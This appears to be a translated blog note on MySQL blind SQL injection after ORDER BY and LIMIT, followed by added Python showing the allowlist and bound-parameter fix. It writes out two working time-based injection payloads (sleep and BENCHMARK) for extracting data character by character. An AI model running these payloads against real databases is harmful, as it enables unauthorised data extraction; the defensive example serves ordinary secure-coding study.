Injection after ORDER BY: usually try error-based injection first. When no error is returned, boolean-based blind injection can be carried out with rand(true) and rand(false). Today, however, I met a case with no echoed data (that is, there is no data in the database), which is much more troublesome. Recording the SQL statements here.
Reference articles: https://www.cnblogs.com/babers/p/7397525.html
https://www.cnblogs.com/Vinson404/p/7246792.html?utm_source=itdadao&utm_medium=referral
In short: it seems that only 5.5 and 5.7 can be injected, not 5.6 (personal opinion, not necessarily correct).
Since I only have MySQL 5.6 and 5.7 locally, 5.7 is used here to reproduce the vulnerability.
5.7 statement: order by (select 1 from (select 1 and if(ascii(substr((user()),1,1))=114,sleep(5),1))x)# (Note: MySQL requires the derived table to have an alias, here x.)
On 5.7, this case can be converted into injection after LIMIT:
ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
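
Both statements above work only when request input is copied into the ORDER BY or LIMIT part of the query text. The following is an added example, not code from the original post or the referenced articles, showing the usual fix: the sort column and direction come from an allowlist and LIMIT/OFFSET are bound as integers. The table, column and function names are hypothetical, and SQLite is used only so the example runs offline; the same construction applies with a MySQL driver and its placeholder style.

```python
import sqlite3

# Hypothetical client-facing sort keys mapped to fixed column identifiers.
# Request input selects an entry; it is never copied into the SQL text.
SORT_COLUMNS = {"id": "id", "name": "name", "created": "created_at"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}
MAX_PAGE_SIZE = 100


def build_user_query(sort="id", direction="asc", limit=20, offset=0):
    """Return (sql, params); raise ValueError for anything off the allowlist."""
    try:
        column = SORT_COLUMNS[sort]
        order = DIRECTIONS[str(direction).lower()]
    except (KeyError, TypeError):
        raise ValueError("unsupported sort parameter") from None
    try:
        # int() rejects strings such as "1,1 PROCEDURE analyse(...)".
        limit, offset = int(limit), int(offset)
    except (TypeError, ValueError):
        raise ValueError("limit/offset must be integers") from None
    if not 1 <= limit <= MAX_PAGE_SIZE or offset < 0:
        raise ValueError("limit/offset out of range")
    # Only allowlisted constants reach the identifier positions; the
    # numeric values travel as bound parameters.
    sql = f"SELECT id, name FROM users ORDER BY {column} {order} LIMIT ? OFFSET ?"
    return sql, (limit, offset)


def demo():
    """Run the built query against constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, created_at TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "carol", "2024-01-03"), (2, "alice", "2024-01-01"),
         (3, "bob", "2024-01-02")],  # constructed sample data
    )
    sql, params = build_user_query("name", "desc", 2, 0)
    return db.execute(sql, params).fetchall()


if __name__ == "__main__":
    print(demo())
```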